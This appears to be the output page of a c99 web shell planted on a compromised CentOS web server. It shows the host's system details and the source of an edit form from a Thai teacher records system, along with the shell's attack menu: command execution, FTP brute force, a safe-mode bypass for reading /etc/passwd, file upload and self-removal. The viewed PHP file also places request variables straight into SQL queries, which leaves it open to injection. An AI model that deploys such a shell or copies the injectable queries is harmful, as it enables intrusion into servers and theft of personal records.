!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/Monny_depart/personal/Decoration/   drwxr-xr-x
Free 49.64 GB of 127.8 GB (38.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Editdecoration.php (5.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("../../../include/FunctionDB.php");
include("../../../include/Function.php");
 session_start();
 if (session_is_registered("valid_user")&&session_is_registered("password"))
 {
 $Username $valid_user;
 $Password $password;
ConnectDB();
$sql "Select * From personal_tb Where Teacher_code='$Teacher_code'";
$result mysql_query($sql) or die(" Error").mysql_error();
$rss mysql_fetch_array($result);
/////////////////////////////////
$sql2 "Select * From history_decoration_tb Where Code='$Code'";
$result2mysql_query($sql2) or die(" Error").mysql_error();
$rs mysql_fetch_array($result2);

?>
<html>
<head>
<title>Add building data</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../../../css/style1.css" rel="stylesheet" type="text/css">
</head>

<body topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
  <tr> 
    <td width="20%" background="../../../Image/barm.jpg" class="table"> 
      <div align="center"><strong><font size="2" face="Tahoma"><a href="../../menu_manage.php" class="d" >กลับหน้าหลัก</a></font></strong></div></td>
    <td width="20%" background="../../../Image/barm.jpg" class="table"> 
      <div align="center"><strong><font size="2" face="Tahoma"><a href="PersonalList.php" class="d" >แสดงรายการทั้งหมด</a></font></strong></div></td>
    <td width="20%" background="../../../Image/barm.jpg" class="table"> 
      <div align="center"><strong><font size="2" face="Tahoma"><a href="../../../logout.php" class="d" >Logout</a></font></strong></div></td>
  </tr>
</table>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr> 
    <td>&nbsp;</td>
  </tr>
</table>
<table width="95%" border="0" align="center" cellpadding="0" cellspacing="1" style="background-color:#eeeeee; border:1px solid gray"size="12">
  <form action="Edit.php" method="post">
    <tr bgcolor="#F3D6F2"> 
      <td colspan="3"> 
        <div align="center"><font color="#999999" size="4" face="Tahoma"><strong><font color="#CC0000">แก้ไข 
          </font><font color="#000000" size="4" face="Tahoma">ประวัติการรับพระราชทานเครื่องราชอิสริยาภรณ์</font></strong></font></div></td>
    </tr>
    <tr bgcolor="#F3F3F3"> 
      <td bordercolor="#CCCCCC"> 
        <div align="center"><font size="2" face="Tahoma">ชื่อ 
          - นามสกุล</font></div></td>
      <td bordercolor="#FFFFCC">&nbsp;</td>
      <td bordercolor="#FFFFCC"><font color="#003366" size="2" face="Tahoma">&nbsp; 
        <?php echo $rss[First_name] ;?> <?php echo $rss[Teacher_name] ;?> <? echo $rss[Teacher_lastname];?></font><font size="2" face="Tahoma">&nbsp;</font></td>
    </tr>
    <tr bgcolor="#F3F3F3"> 
      <td width="28%" bordercolor="#CCCCCC"> 
        <div align="center"><font size="2" face="Tahoma">ปีที่ได้รับ</font></div></td>
      <td width="3%" bordercolor="#FFFFCC">&nbsp;</td>
      <td width="69%" bordercolor="#FFFFCC"> <font color="#000000" size="2" face="Tahoma">ี่ 
        ปี พ.ศ. 
        <input name="Year_receive" type="text" class="input1" id="Year_receive"  value="<? echo $rs[Year_receive]?>" size="10">
        </font></td>
    </tr>
    <tr bgcolor="#F3F3F3"> 
      <td bordercolor="#CCCCCC"> 
        <div align="center"><font size="2" face="Tahoma">ชั้นเครื่องราชฯ</font></div></td>
      <td bordercolor="#FFFFCC">&nbsp;</td>
      <td bordercolor="#FFFFCC"> 
        <input name="Decoration_name" type="text" class="input1" id="Decoration_name" value="<? echo $rs[Decoration_name]?>" size="50" ></td>
    </tr>
    <tr bgcolor="#F3F3F3"> 
      <td bordercolor="#CCCCCC"> 
        <div align="center"><font size="2" face="Tahoma">เล่มที่</font></div></td>
      <td bordercolor="#FFFFCC">&nbsp;</td>
      <td bordercolor="#FFFFCC"> 
        <input name="Volumn" type="text" id="Volumn" value="<? echo $rs[Volumn]?>" size="15" class="input1"> 
        <font size="2" face="Tahoma">ตอนที่ 
        <input name="Col" type="text" id="Col" value="<? echo $rs[Col]?>" size="15" class="input1">
        หน้าที่ 
        <input name="Page" type="text" id="Page" value="<? echo $rs[Page]?>" size="10" class="input1">
        </font></td>
    </tr>
    <tr bgcolor="#F3F3F3"> 
      <td bordercolor="#CCCCCC"> 
        <div align="center"><font size="2" face="Tahoma">ลำดับที่</font></div></td>
      <td bordercolor="#FFFFCC">&nbsp;</td>
      <td bordercolor="#FFFFCC"> 
        <input name="Orderlist" type="text" class="input1" id="Orderlist" value="<? echo $rs[Orderlist]?>" size="10"></td>
    </tr>
    <tr bgcolor="#F3D6F2"> 
      <td colspan="3"> <div align="center"> 
       <input type="hidden" name="Teacher_code" value="<? echo $rs[Teacher_code]?>">
          <input type="hidden" name="Code" value="<? echo $rs[Code]?>">
          <input type="submit" name="Submit" value="   บันทึก   " class="button">
        </div></td>
    </tr>
  </form>
</table>
</body>
</html>

<?php 
    }
else
{
       echo"<meta http-equiv=\"refresh\" content=\"3;URL=../../login.php\">\n";
       echo"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0165 ]--